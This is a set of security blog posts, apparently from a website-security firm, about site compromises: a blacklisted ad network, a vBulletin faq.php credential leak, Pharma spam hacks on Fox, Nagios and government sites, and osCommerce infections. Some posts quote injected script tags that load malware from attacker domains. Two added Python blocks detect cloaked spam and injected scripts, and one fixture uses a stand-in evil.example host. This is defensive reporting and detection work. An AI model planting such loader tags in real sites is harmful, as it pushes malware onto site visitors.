UFC.com blacklisted by Google (indirectly)

Anyone trying to visit the site UFC.com (from Google Chrome or Firefox) will get a big scary warning from Google:

UFC.com blacklisted

Warning: Visiting this site may harm your computer!
The website at www.ufc.com contains elements from the site bin.clearspring.com, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.

They are getting indirectly blacklisted because they are loading content from bin.clearspring.com (an advertising network), which is currently blacklisted by Google for having malware.

As far as Clearspring is concerned, it seems they’ve been hacked and the attacker has added malicious code that loads malware from semaniseme.com and wenmo.in. So there are multiple levels of indirection here before UFC.com users are affected.

Anyone else using clearspring should remove their code from their sites until they have this blacklist issue sorted out.

To avoid getting your site blacklisted or with malware, visit http://sucuri.net to learn about our site security monitoring and malware removal solutions.

Vulnerability in Vbulletin 3.8.6

If you are running Vbulletin 3.8.6 (the latest 3.8.x version), make sure to remove the faq.php as soon as possible. A vulnerability has been found that allows anyone to retrieve the database credentials from there.

The VBSEO team was quick to react and sent the following note to their clients a little while ago:

Hello valued vBSEO customer,

It has come to our attention that a vulnerability on vBulletin 3.8.6
has been discovered. The exploit allows a malicious user to retrieve a
forum’s database credentials via the faq.php script.

If you are running vBulletin 3.8.6, we strongly recommend that you
remove the faq.php script and change your mysql database details as a
precaution.

You can find faq.php in your vBulletin installation directory:
*/vbroot/faq.php

Update: Patch available here.

It seems that a patch is coming very soon too. Some discussion about this issue here. Thanks to Marcus Maciel for the heads up.

Yet another series of attacks – This time using whereisdudescars.com

Update 1: It seems that this attack is limited to only Bluehost and Dreamhost, not GoDaddy like in the previous times.
Update 2: This script should fix/clean an infected site: site fix.php
Update 3: Attackers are using nowisisdudescars.com and onlineisdudescars.com as well.

We’re tracking another series of attacks affecting many web sites (WordPress seems to be the target application so far). This time they’re using whereisdudescars.com as the attacking site and adding the following javascript to the web sites:

<script src=" http://whereisdudescars.com/js2.php"></script>

<script src=" http://nowisisdudescars.com/js.php

This code then loads another javascript from http://www4.realprotection36.co.cc that attempts to push the “Fake Anti virus” (rogue antivirus) malware onto visitors of the site.

Read More

Fox News Website Hacked

We reported yesterday evening that various sites in the Fox web network have been infected with the Pharma Hack. It doesn’t stop there.

I just ran some scans on the official Fox News site (foxnews.com) and here are the results:

Read More

Various Fox Websites Hit With Pharma Hack

Fox Websites Exploited with Pharma Hack

If you’ve been following Sucuri, you’ve seen a bunch of discussion around the steadily growing Pharma Hack. As we continue research on the issue we find more and more variations of the exploit.

Earlier this evening, we started noticing various domains from the same network of sites appearing in our test results. It looks like various pages on sites owned or operated by Fox Television Stations, Inc. and/or their affiliates have been compromised. We’ve followed up and scanned a set of these sites, and at the time this post was written, they were still serving the spam exploit.

Read More

Understanding and cleaning the Pharma hack on WordPress

In the last few weeks, the most common questions we’re receiving are related to the “Pharma” (or Blackhat SEO Spam) Hack on WordPress sites.

This attack is very interesting because it is invisible to the normal user: the spam (generally about Viagra, Nexium, Cialis, etc.) only shows up when the user agent is Google’s crawler (Googlebot). The infection is also a bit tricky to remove and, if not removed properly, will keep reappearing.

Because of this behavior, many sites have been compromised for months with those spam keywords without anyone noticing. A quick way to check whether your site is compromised is to search Google for “inurl:yoursite.com cheap viagra or cheap cialis” or to use our security scanner.

For example, this is the result of our scanner against wpremix.com (which was infected at the time we were writing this post):


Read More

Nagios Community Site Hacked

We just detected (via our scanner) that the Nagios community site (community.nagios.org) has been hacked and is redirecting to a Viagra site. The result varies depending on the page requested.

If you request any page and add an “order=X” parameter to the query string, you will be redirected. Example:

$ lynx --head --dump http://community.nagios.org/?order=1
HTTP/1.1 302 Found
Date: Tue, 13 Jul 2010 02:54:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Location: http://the pharmacy discount.com/item.php?id=1095&said=m111
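The two behaviours described in the Pharma hack post and in this one (spam served only to Googlebot, and a redirect that only fires for certain requests) can both be caught by probing a page more than once and diffing the responses. The following is an added example (not Sucuri’s scanner); the spam terms come from the posts, and the sample responses, host names and the “?order=1” probe are constructed:

```python
import re
import urllib.error
import urllib.request
from typing import Dict, List, NamedTuple

PHARMA_TERMS = ("viagra", "cialis", "nexium", "pharmacy")  # spam terms named in the posts

class Probe(NamedTuple):
    name: str                # which client/request this probe represents
    status: int
    headers: Dict[str, str]  # header names lower-cased
    body: str

def pharma_hits(body: str) -> List[str]:  # whole-word, case-insensitive matches
    return [t for t in PHARMA_TERMS if re.search(rf"\b{t}\b", body, re.I)]

def compare_probes(baseline: Probe, probes: List[Probe]) -> List[str]:
    """Flag probes that differ from the baseline the way the Pharma hack does: spam terms
    served only to that client (cloaking), or a redirect the baseline does not get."""
    findings = []
    base_hits = set(pharma_hits(baseline.body))
    for p in probes:
        cloaked = sorted(set(pharma_hits(p.body)) - base_hits)
        if cloaked:
            findings.append(f"{p.name}: cloaked spam terms {cloaked}")
        if 300 <= p.status < 400 and not 300 <= baseline.status < 400:
            findings.append(f"{p.name}: conditional redirect to {p.headers.get('location', '?')}")
    return findings

class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # keep the 3xx response instead of following it

def fetch_probe(url: str, name: str, user_agent: str = "Mozilla/5.0") -> Probe:  # live; needs network
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    try:
        resp = urllib.request.build_opener(_NoRedirect).open(req, timeout=15)
    except urllib.error.HTTPError as err:  # 3xx/4xx/5xx responses arrive here
        resp = err
    hdrs = {k.lower(): v for k, v in resp.headers.items()}
    return Probe(name, resp.code, hdrs, resp.read().decode("utf-8", "replace"))

def demo() -> List[str]:
    """Constructed responses (not real captures) mimicking the behaviour in the posts."""
    clean = "<html><body><h1>Community</h1><p>Welcome to the forum.</p></body></html>"
    spam = clean.replace("</p>", "<div style='display:none'>cheap viagra cialis</div></p>")
    return compare_probes(Probe("normal browser", 200, {}, clean), [
        Probe("googlebot", 200, {}, spam),
        Probe("?order=1", 302, {"location": "http://example.invalid/item.php?id=1"}, "")])
```

Against a live site, build the baseline with fetch_probe(url, "normal browser") and the others with a Googlebot user agent and with the extra query parameter, then pass them to compare_probes.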


Read More

Israel’s permanent mission in the UN web site hacked

As we dig into this blackhat SEO spam network, we are finding more and more sites hacked by them.

One of the sites we discovered is http://israel-un.mfa.gov.il (the Israeli permanent mission to the UN). They were probably exploited because the site runs an old version of Joomla with known security vulnerabilities.

These are the results of our scan against it:

In fact, if you just view their source code you will find all the spam:

Read More

Argentinean Government web sites hacked with spam

We recently blogged that many sites from the Brazilian government got hacked and were being used as part of a large blackhat SEO spam network.

Well, the Brazilians are not alone and many web sites from the Argentinean government got hacked as well and are being used by spammers. Some of them are official web sites for ministries, states and cities throughout Argentina.

http://www.bnm.me.gov.ar
http://www.trabajo.gov.ar
http://www.cedem.gov.ar
http://www.sanmartin.gov.ar
http://www.jusmisiones.gov.ar
http://www.apostoles.gov.ar
http://www.cordoba.gov.ar
http://www.santafecultura.gov.ar
http://www.mocoreta.gov.ar
..
http://www.lasheras.gov.ar
http://www.dipes.catamarca.gov.ar
http://www2.berisso.gba.gov.ar

(and many more)

All of them got hacked and you can easily find a lot more sites like that on Google just by searching for “inurl:.gov.ar “cheap viagra” or “cheap cialis””. Examples of Google results:

Read More

osCommerce users, update your installations as soon as possible

If you are an osCommerce user, please make sure to update your installation (and check your sites) as soon as possible. We have been tracking multiple compromises of osCommerce installations where the attackers added this javascript malware to the affected sites:

< script src = “http://nt02.co.in/3″ >

This code is used to load malware to unsuspecting visitors of your site. Most of the sites affected also had a few PHP files inserted inside the /images folder, generally called inclasses.php, loadclasses.php or phpclasses.php.
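Both indicators from this post (a script tag pulling code from a host that is not yours, and PHP files dropped into /images) can be checked for on the server side. The following scanner is an added example, not Sucuri’s tooling; the file tree it scans is constructed in a temporary directory, and evil.example / shop.example are placeholder hosts:

```python
import re
import tempfile
from pathlib import Path
from typing import List, Set
from urllib.parse import urlparse

# Tolerates the spacing and curly quotes of the injected tag quoted above.
SCRIPT_SRC = re.compile(r"""<\s*script[^>]*?src\s*=\s*["'“”]?\s*(https?://[^\s"'“”″>]+)""", re.I)
WEB_EXT = {".php", ".html", ".htm", ".tpl", ".js"}

def external_scripts(text: str, own_hosts: Set[str]) -> List[str]:
    """Absolute script URLs whose host is not one of the site's own hosts."""
    return [u for u in SCRIPT_SRC.findall(text) if urlparse(u).hostname not in own_hosts]

def scan_site(root: str, own_hosts: Set[str]) -> List[str]:
    """Walk a site's document root and report the two indicators from the post."""
    findings, base = [], Path(root)
    for path in sorted(p for p in base.rglob("*") if p.is_file()):
        rel = path.relative_to(base)
        # 1) PHP dropped where only images belong (inclasses.php, loadclasses.php, ...)
        if path.suffix.lower() == ".php" and "images" in rel.parts:
            findings.append(f"{rel.as_posix()}: PHP file inside an images directory")
        # 2) script tags pulling code from hosts that are not ours
        if path.suffix.lower() in WEB_EXT:
            text = path.read_text(encoding="utf-8", errors="replace")
            for url in external_scripts(text, own_hosts):
                findings.append(f"{rel.as_posix()}: external script {url}")
    return findings

def demo() -> List[str]:
    """Constructed osCommerce-like tree: one injected tag, one dropped PHP file, one clean page."""
    with tempfile.TemporaryDirectory() as d:
        site = Path(d)
        (site / "images").mkdir()
        (site / "images" / "logo.gif").write_bytes(b"GIF89a")
        (site / "images" / "inclasses.php").write_text("<?php /* dropped file */ ?>", encoding="utf-8")
        (site / "index.php").write_text("<html><script src=\"/js/site.js\"></script>"
                                        "< script src = “http://evil.example/3″ ></html>", encoding="utf-8")
        (site / "contact.php").write_text("<html><script src='http://shop.example/a.js'></script>",
                                          encoding="utf-8")
        return scan_site(d, {"shop.example"})
```

Run scan_site against your real document root with the set of hosts you legitimately serve scripts from; anything it reports is worth a manual look, and the dropped PHP files should be compared against a clean osCommerce checkout.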

We are still researching how those sites got hacked and which vulnerability was used. It could be this one, or some of the others recently published.

If you have more information let us know.